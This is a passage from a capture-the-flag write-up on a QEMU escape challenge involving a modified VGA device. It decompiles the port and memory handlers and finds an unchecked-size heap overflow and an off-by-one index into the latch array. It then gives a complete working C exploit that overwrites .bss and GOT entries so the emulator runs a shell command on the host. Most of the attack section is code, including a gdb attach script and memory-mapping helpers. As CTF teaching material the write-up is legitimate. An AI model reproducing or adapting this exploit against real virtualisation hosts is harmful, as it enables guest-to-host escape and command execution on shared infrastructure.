    case 0xCE:
LABEL_28:
      opaque->vga.sr[v10] = v4;
      break;
    // ...
```

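So by writing 0xCC to port 0x3C4 (which sets opaque->vga.sr_index) and then the desired value to port 0x3C5, we control v7; opaque->vga.sr[0xCD] and sr[0xCE] can be set the same way.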

In total there are five operations (idx = BYTE2(mem_value), i.e. bits 16-23):

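- (1) v7 == 0: if vulncnt <= 0x10 and mem_value <= 0x1000, opaque->vs[vulncnt].buf = malloc(mem_value) and max_size = mem_value; vulncnt is incremented if malloc succeeds.

- (2) v7 == 1: if cur_size < max_size, opaque->vs[idx].buf[cur_size++] = mem_value & 0xff.

- (3) v7 == 2: __printf_chk(1, opaque->vs[idx].buf).

- (4) v7 == 3: if mem_value <= 0x1000, opaque->vs[idx].max_size = mem_value.

- (5) v7 == 4: if cur_size <= 0xfff, opaque->vs[idx].buf[cur_size++] = mem_value & 0xff.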
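To make the decoding concrete, here is a small model of how one byte write at offset >= 0x18100 is turned into an operation, a value and an index. It only mirrors the decompiled listing above (names are hypothetical, and treating the sr[0xCD] test as a 16-bit check is an assumption based on the listing). It also shows the settings the exp below relies on: sr[0xCC] = 4 and sr[0xCD] = 0x10 select the unchecked write on entry 16:

```c
#include <stdint.h>

/* Hypothetical model of the addr >= 0x18100 branch of cydf_vga_mem_write. */
enum cydf_op {
    CYDF_ALLOC = 0,          /* vs[vulncnt].buf = malloc(mem_value) */
    CYDF_PUSH_CHECKED = 1,   /* buf[cur_size++] = byte, only if cur_size < max_size */
    CYDF_PRINT = 2,          /* __printf_chk(1, vs[idx].buf) */
    CYDF_SET_MAX = 3,        /* vs[idx].max_size = mem_value */
    CYDF_PUSH_UNCHECKED = 4  /* buf[cur_size++] = byte, only cur_size <= 0xfff checked */
};

struct cydf_cmd {
    enum cydf_op op;
    uint32_t mem_value;
    uint8_t idx; /* BYTE2(mem_value) */
};

static struct cydf_cmd cydf_decode(uint8_t sr_cc, uint8_t sr_cd, uint8_t sr_ce, uint8_t byte)
{
    struct cydf_cmd c;
    c.op = (enum cydf_op)(sr_cc % 5);
    c.mem_value = byte;
    /* the listing tests sr[0xCD] (apparently as a 16-bit word with sr[0xCE]) */
    if (sr_cd != 0 || sr_ce != 0)
        c.mem_value = ((uint32_t)sr_cd << 16) | ((uint32_t)sr_ce << 8) | byte;
    c.idx = (uint8_t)(c.mem_value >> 16);
    return c;
}

/* The handlers accept idx <= 0x10, but vs[] only has 16 entries (0..15). */
static int cydf_idx_accepted(uint8_t idx) { return idx <= 0x10; }
static int cydf_idx_in_bounds(uint8_t idx) { return idx < 16; }
```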

This reveals the vulnerabilities:

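- When v7 == 4, cur_size is only checked against 0xfff and never against max_size, so writing past a smaller allocation overflows the heap buffer.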

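- The CydfVGAState_0 structure in IDA shows:

```
CydfVGAState_0
000133D8 vs    VulnState_0 16 dup(?)
000134D8 latch dd 4 dup(?)
```

The vs array has only 16 entries (0x134D8 - 0x133D8 = 0x100 bytes, i.e. 16 bytes per VulnState), but the handlers accept idx == 16 (the checks are idx <= 0x10), so vs[16] overflows into latch[]. latch[0], in turn, can be controlled through cydf_vga_mem_read:

```c
v3 = opaque->latch[0];
if ( !(_WORD)v3 )
{
  opaque->latch[0] = addr | v3;
  return vga_mem_readb(&opaque->vga, addr);
}
opaque->latch[0] = (_DWORD)addr << 16;
```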
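The two reads in the exp's set_latch rely on this update rule. A small model of it (hypothetical helper names; it only mirrors the decompiled snippet, treating latch[0] as a 32-bit value) shows why the exp also performs one extra "init latch" read first, assuming latch[0] starts at 0:

```c
#include <stdint.h>

/* Model of the latch[0] update in cydf_vga_mem_read: if the low 16 bits
   are zero, OR the read offset in; otherwise replace latch[0] with offset << 16. */
static uint32_t latch_after_read(uint32_t latch, uint32_t offset)
{
    if ((uint16_t)latch == 0)
        return latch | offset;
    return offset << 16;
}

/* Mirror of the exp's set_latch(value): read at the high half, then at the
   low half. It only lands on `value` if the low 16 bits of latch[0] are
   non-zero beforehand, which is what the initial read at offset 1 arranges. */
static uint32_t latch_after_set(uint32_t latch, uint32_t value)
{
    latch = latch_after_read(latch, (value >> 16) & 0xffff);
    return latch_after_read(latch, value & 0xffff);
}
```

After a successful set_latch the low half equals value & 0xffff, so consecutive calls keep working as long as the low 16 bits of each target are non-zero.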

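Since the binary has no PIE and only Partial RELRO (see the checksec output above), the .bss and GOT addresses are fixed and writable, which gives the following exploitation steps: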

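- (1) Write "cat /flag" to some address addr in the .bss section.

- (2) Overwrite qemu_logfile with addr.

- (3) Overwrite the GOT entry of vfprintf with system@plt.

- (4) Overwrite the GOT entry of __printf_chk with the address of qemu_log.

- (5) Trigger __printf_chk with v7 == 2. It now runs qemu_log, whose vfprintf(qemu_logfile, ...) call becomes system(addr), i.e. system("cat /flag").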
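Steps 1-4 all go through vs[16], whose fields overlap latch[]. Assuming (from the layout above) that vs[16].buf is the 8 bytes at latch[0..1] with latch[1] == 0, and that its cur_size keeps growing across all writes, each byte lands at latch[0] + cur_size. That is why the exp sets latch[0] to target - bytes_already_written. A hypothetical helper spelling this out with the exp's own constants:

```c
#include <stdint.h>

/* With every v7 == 4 write going to latch[0] + cur_size (cur_size = bytes
   written so far through vs[16]), the latch value needed to hit `target`
   is the target minus the bytes already written. */
static uint32_t latch_for_target(uint32_t target, uint32_t written)
{
    return target - written;
}

/* Address that the next byte would be stored at for a given latch value. */
static uint32_t store_address(uint32_t latch, uint32_t written)
{
    return latch + written;
}
```

With 9 bytes of "cat /flag" written first, qemu_logfile (0x10CCBE0) needs latch[0] = 0x10CCBD7, and after 8 more bytes the vfprintf GOT entry (0xEE7BB0) needs 0xEE7B9F.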

Step 3: Debugging

To get the exp onto the target, encode it with base64 and decode it inside the VM. In another terminal, run the following script to attach gdb:

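```shell
#!/bin/bash
# Find the PID of the running qemu-system-x86_64 and attach gdb to it.
# Uses bash pattern substitution; `pgrep -f qemu-system-x86_64` is a simpler way to get the PID.
str=`ps -ax | grep qemu`
PID=${str/qemu-system-x86_64*/}   # cut everything from the binary name onwards
if [ "$str" != "$PID" ]; then
    PID=${PID/ pt*/}              # cut the " pts/N ..." tty column
    PID=${PID/ /}                 # remove the leading space
    echo ${PID}
    sudo gdb -q --pid=${PID}
else
    echo "run qemu first..."
fi
```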

Accessing PMIO

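UAFIO describes three ways to access PMIO; here is a convenient one: the IN and OUT instructions. They read or write 1, 2 or 4 bytes (outb/inb, outw/inw, outl/inl); the functions are declared in <sys/io.h>, and their usage is documented in the man pages.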

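Note that accessing ports requires privileges, so the program must run as root. For ports 0x000-0x3ff, ioperm(from, num, turn_on) is enough; for ports above 0x3ff, iopl(3) has traditionally been used to allow access to all ports (older kernels limited ioperm to the first 0x400 ports; see man ioperm and man iopl).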

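Here the vga+ ports are 0x3c0-0x3df, so the exp only needs root inside the guest and a call to ioperm(0x3b0, 0x30, 1), which opens 0x3b0-0x3df and therefore covers that range.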
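The port numbers line up if the 0x30-byte cydf-io region starts at port 0x3b0, as QEMU's cirrus-io region does (the cirrus handler adds 0x3b0 back to the offset, which would explain why the decompiled switch uses case 0x3C4/0x3C5). A tiny sketch of that arithmetic; the base address is an assumption and the names are hypothetical:

```c
#include <stdint.h>

/* Assumption: like QEMU's cirrus-io region, cydf-io (0x30 bytes) starts at port 0x3b0. */
#define CYDF_IO_BASE 0x3b0u
#define CYDF_IO_SIZE 0x30u

/* Would ioperm(CYDF_IO_BASE, CYDF_IO_SIZE, 1) grant access to this port? */
static int port_covered(uint16_t port)
{
    return port >= CYDF_IO_BASE && port < CYDF_IO_BASE + CYDF_IO_SIZE;
}

/* Offset within the region that the memory API hands to the handler. */
static uint16_t cydf_io_offset(uint16_t port)
{
    return (uint16_t)(port - CYDF_IO_BASE);
}
```

Both sequencer ports used by set_sr (0x3c4 for the index, 0x3c5 for the data) fall inside this window.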

When calling cydf_vga_ioport_write, using outl or outw did not pass the val argument through, while outb worked; I have not figured out why.

Accessing vga_mem

The vga_mem region does not appear in the resource file. According to the comment above cirrus_vga_mem_read in the source, VGA memory lives at 0xa0000-0xbffff, which matches the output of cat /proc/iomem:

```c
/***************************************
 *
 *  memory access between 0xa0000-0xbffff
 *
 ***************************************/

static uint64_t cirrus_vga_mem_read(void *opaque,
                                    hwaddr addr,
                                    uint32_t size)
```

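A simple way to access physical memory is to map /dev/mem into our process; we can then read and write it like ordinary memory. The provided environment has no /dev/mem device node, but we can create it with mknod -m 660 /dev/mem c 1 1.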

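```c
// create the /dev/mem node (character device, major 1, minor 1)
system( "mknod -m 660 /dev/mem c 1 1" );
int fd = open( "/dev/mem", O_RDWR | O_SYNC );
if ( fd == -1 ) {
    die("open /dev/mem failed");
}
// BAR 1 of cydf-vga: the 0x1000-byte MMIO region
mmio_mem = mmap( NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0xfebc1000 );
if ( mmio_mem == MAP_FAILED ) {   // mmap reports errors with MAP_FAILED, not NULL
    die("mmap mmio failed");
}
// legacy VGA window 0xa0000-0xbffff
vga_mem = mmap( NULL, 0x20000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0xa0000 );
if ( vga_mem == MAP_FAILED ) {
    die("mmap vga mem failed");
}
```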

The program does not stop at the breakpoints

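- (1) When reading vga_mem to invoke cydf_vga_mem_read, the debugger never stopped at the breakpoint in that handler. (This one kept me stuck for a long time.)

Possible cause: when compiling exp.c, if the value read from vga_mem is never used, the read has no effect on the program's result, so the compiler may optimize it away. The handler is then never called and the breakpoint never triggers. This may also be why many existing exps do not work as published.

Solution: print the value that was read.

- (2) The same problem occurs with vga_mem_write, and the fix is the same: print the data being written.

- (3) When using vga_mem_write for the arbitrary write, the data actually written was not what we passed in.

Solution: again, print the data being written. In addition, when writing the "cat /flag" string, printing it with printf("%s") still did not help; it only worked when each character was written out individually.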
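An alternative to printing every value (not what the author tested, so treat it as an assumption) is to access the mapped region through a volatile pointer. This would also explain problems 2 and 3: the payload loops store to the same address vga_mem[0x18100] again and again, and through a plain pointer the compiler is allowed to merge such repeated stores into one; a write() call between the stores prevents that. A sketch with hypothetical helper names:

```c
#include <stddef.h>
#include <stdint.h>

/* Every access through a volatile-qualified lvalue is a side effect, so the
   compiler must emit each load and store, in order, even if a loaded value
   is unused or the same address is written repeatedly. */
static inline uint8_t mem_read8(const volatile uint8_t *base, size_t off)
{
    return base[off];
}

static inline void mem_write8(volatile uint8_t *base, size_t off, uint8_t val)
{
    base[off] = val;
}

/* The exp's payload loop with volatile stores instead of printing each byte. */
static void write_bytes_at(volatile uint8_t *base, size_t off, const uint8_t *src, size_t n)
{
    for (size_t i = 0; i < n; i++)
        mem_write8(base, off, src[i]); /* same address each time, like vga_mem_write(0x18100, ...) */
}
```

In the exp, vga_mem would then be declared as volatile unsigned char * and the write(1, ...) calls could be dropped.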

exp

```c
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/io.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

uint32_t mmio_addr = 0xfebc1000;   // BAR 1 (cydf-mmio)
uint32_t mmio_size = 0x1000;
uint32_t vga_addr = 0xa0000;       // legacy VGA window (cydf-low-memory)
uint32_t vga_size = 0x20000;

unsigned char* mmio_mem;
unsigned char* vga_mem;

void die(const char* msg)
{
    perror(msg);
    exit(-1);
}

// write val to sequencer register sr[idx]: index port 0x3c4, data port 0x3c5
void set_sr(unsigned int idx, unsigned int val){
    outb(idx,0x3c4);
    outb(val,0x3c5);
}

// byte store into the VGA window, handled by cydf_vga_mem_write
void vga_mem_write(uint32_t addr, uint8_t value)
{
    *( (uint8_t *) (vga_mem+addr) ) = value;
}

// two reads through cydf_vga_mem_read set latch[0] = value (high half first);
// the bytes read are written to stdout so the reads are not optimized away
void set_latch( uint32_t value){
    char a;
    a = vga_mem[(value>>16)&0xffff];
    write(1,&a,1);
    a = vga_mem[value&0xffff];
    write(1,&a,1);
}

int main(int argc, char *argv[])
{
    //step 1 mmap /dev/mem to system, (man mem) to see the detail
    system( "mknod -m 660 /dev/mem c 1 1" );
    int fd = open( "/dev/mem", O_RDWR | O_SYNC );
    if ( fd == -1 ) {
        die("open /dev/mem failed");
    }

    //step2 map the address to fd (mmap signals failure with MAP_FAILED, not NULL)
    mmio_mem = mmap( NULL, mmio_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, mmio_addr );
    if ( mmio_mem == MAP_FAILED ) {
        die("mmap mmio failed");
    }
    vga_mem = mmap( NULL, vga_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, vga_addr );
    if ( vga_mem == MAP_FAILED ) {
        die("mmap vga mem failed");
    }

    if (ioperm(0x3b0, 0x30, 1) == -1) {
        die("cannot ioperm");
    }

    set_sr(7,1);        // SR7 bit 0 = extended mode; in cirrus_vga.c the 0x18000+ paths need it
    set_sr(0xcc,4);     // v7==4
    set_sr(0xcd,0x10);  // vs[0x10]

    // write cat /flag to bss
    char a;
    unsigned int index = 0;     // bytes written so far through vs[16]
    uint64_t bss = 0x10C9850;
    char* payload = "cat /flag";
    a=vga_mem[1];write(1,&a,1); //init latch
    set_latch(bss);             //set latch[0]
    for (int i=0; i<9; i++) {
        write(1,&payload[i],1);
        vga_mem_write(0x18100,payload[i]);
    }
    index+=9;

    //qemu_logfile -> bss
    uint32_t qemu_logfile = 0x10CCBE0;
    set_latch(qemu_logfile-index);
    payload = (char*)&bss;
    printf("%s\n",payload);
    for (int i=0; i<8; i++) {
        vga_mem_write(0x18100,payload[i]);
    }
    index+=8;

    //vfprintf.got -> system.plt
    uint32_t vfprintf_got=0xEE7BB0;
    uint64_t system_plt=0x409DD0;
    set_latch(vfprintf_got-index);
    payload = (char*)&system_plt;
    printf("%s\n",payload);
    for (int i=0; i<8; i++) {
        vga_mem_write(0x18100,payload[i]);
    }
    index+=8;

    //printf_chk_got -> qemu_log
    uint64_t qemu_log = 0x9726E8;
    uint32_t printf_chk_got=0xEE7028;
    set_latch(printf_chk_got-index);
    payload = (char*)&qemu_log;
    printf("%s\n",payload);
    for (int i=0; i<8; i++) {
        vga_mem_write(0x18100,payload[i]);
    }

    set_sr(0xcc,2);
    vga_mem_write(0x18100,1);//printf_chk
    return 0;
}
```

Summary

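The vulnerability in the first challenge is in the MMIO region, while the second one requires combining MMIO operations with PMIO operations. From the challenge designer's point of view, the first adds a new, vulnerable device, so there is relatively little code and it is easier; the second is a vulnerable device created by modifying QEMU's own source, so there is much more code and it is harder.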

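Writing this post took me about a week on and off. I ran into many problems while debugging these two challenges, and for some of them I have not dug into the root cause, so corrections are very welcome!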

Reference

qemu-pwn-seccon-2018-q-escape

BlizzardCTF-2017-Strng

q-escape – SECCON 2018

cirrus_vga.c

vgamem

Challenge files: